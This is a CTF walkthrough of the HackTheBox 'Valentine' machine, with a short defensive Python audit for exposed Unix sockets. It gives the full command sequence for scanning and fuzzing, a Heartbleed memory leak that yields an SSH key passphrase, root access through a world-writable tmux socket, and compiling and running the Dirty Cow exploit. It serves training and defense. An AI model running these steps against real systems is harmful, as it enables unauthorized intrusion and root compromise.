HackTheBox Easy Linux Heartbleed OpenSSL CVE-2014-0160 tmux Dirty Cow

Valentine

Heartbleed leaks the passphrase of the RSA key from server memory; SSH in as hype; privilege escalation through a root tmux session.

cat4clysm
Tools used
nmap sslscan wfuzz heartbleed.py john

Scanning

root@kali:~$
nmap -sC -sV -p80,443,22 -n -Pn 10.10.10.79 -oN targeted

Web Enumeration

root@kali:~$
wfuzz -c --hc 403,404 -t 100 -w /usr/share/dirb/wordlists/common.txt http://10.10.10.79/FUZZ

We find /dev/notes.txt and /dev/hype_key (an RSA private key encoded as hex).


Heartbleed - Memory Extraction

root@kali:~$
sslscan 10.10.10.79
root@kali:~$
nmap --script "vuln and safe" -p 443 10.10.10.79
root@kali:~$
python heartbleed.py 10.10.10.79 -n 150
echo 'aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==' | base64 -d
# heartbleedbelievethehype

SSH with hype_key

root@kali:~$
cat hype_key | tr -d ' ' | xxd -ps -r > id_rsa
chmod 600 id_rsa
ssh -i id_rsa hype@10.10.10.79
cat /home/hype/user.txt

Privilege Escalation - root tmux session

root@kali:~$
ps aux
root@kali:~$
tmux -S /.devs/dev_sess
cat /root/root.txt
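
As an added defender-side check (not part of this write-up), the misconfiguration behind this step, a root-owned tmux socket that other users can read and write, can be audited with a short Python script. It walks a directory tree and flags Unix-domain sockets whose mode grants read+write to group or others; the sample sockets it inspects are constructed in a temporary directory.

```python
import os
import socket
import stat
import tempfile
from typing import List, Tuple


def is_exposed_mode(mode: int) -> bool:
    """True when the permission bits grant read+write to group or to others."""
    perms = stat.S_IMODE(mode)
    return (perms & 0o060) == 0o060 or (perms & 0o006) == 0o006


def find_exposed_sockets(root: str) -> List[Tuple[str, int, int]]:
    """Walk `root` and return (path, owner_uid, perms) for every Unix-domain
    socket whose mode would let a user other than the owner attach to it."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable entry; skip it
            if stat.S_ISSOCK(st.st_mode) and is_exposed_mode(st.st_mode):
                hits.append((path, st.st_uid, stat.S_IMODE(st.st_mode)))
    return hits


def make_socket(path: str, mode: int) -> str:
    """Create a bound Unix socket at `path` with the given mode (sample data)."""
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    s.bind(path)
    s.close()  # the socket file stays on disk until unlinked
    os.chmod(path, mode)
    return path


def demo() -> List[str]:
    """Constructed sample: a private 0600 socket next to a world-rw one, the
    situation /.devs/dev_sess was in on the box. Returns flagged basenames."""
    with tempfile.TemporaryDirectory() as tmp:
        make_socket(os.path.join(tmp, "private_sess"), 0o600)
        make_socket(os.path.join(tmp, "dev_sess"), 0o666)
        return sorted(os.path.basename(p) for p, _, _ in find_exposed_sockets(tmp))


if __name__ == "__main__":
    print(demo())
```

Run it against a real host by calling find_exposed_sockets("/") as root and reviewing each hit's owner; tmux sockets should be 0600 and owned by the user who runs the session.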

Alternative - Dirty Cow

root@kali:~$
searchsploit dirty cow
searchsploit -m linux/local/40839.c
mv 40839.c dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty

Lessons learned